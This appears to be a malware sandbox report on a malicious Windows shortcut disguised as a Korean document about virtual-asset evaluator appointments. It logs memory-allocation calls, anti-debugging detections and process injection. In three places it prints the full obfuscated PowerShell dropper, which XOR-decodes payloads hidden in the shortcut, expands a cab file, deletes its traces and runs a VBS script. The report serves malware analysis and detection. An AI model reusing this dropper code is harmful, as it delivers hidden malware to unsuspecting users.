NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c28000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c2e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c2f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\가상자산 관련 외부평가위원 위촉 안내.hwp.lnk

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" ) )
cmdline	C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;"

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 2, 2025, 8:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe \| findstr /i rshell.exe
cmdline	C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" ) )

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\expand.exe" C:\Users\Public\agenda.cab -F:* C:\Users\Public\documents

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3028 resumed a thread in remote process 2216
NtResumeThread May 2, 2025, 8:52 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2216	1	0	0

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\expand.exe

가상자산 관련 외부평가위원 위촉 안내.hwp.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All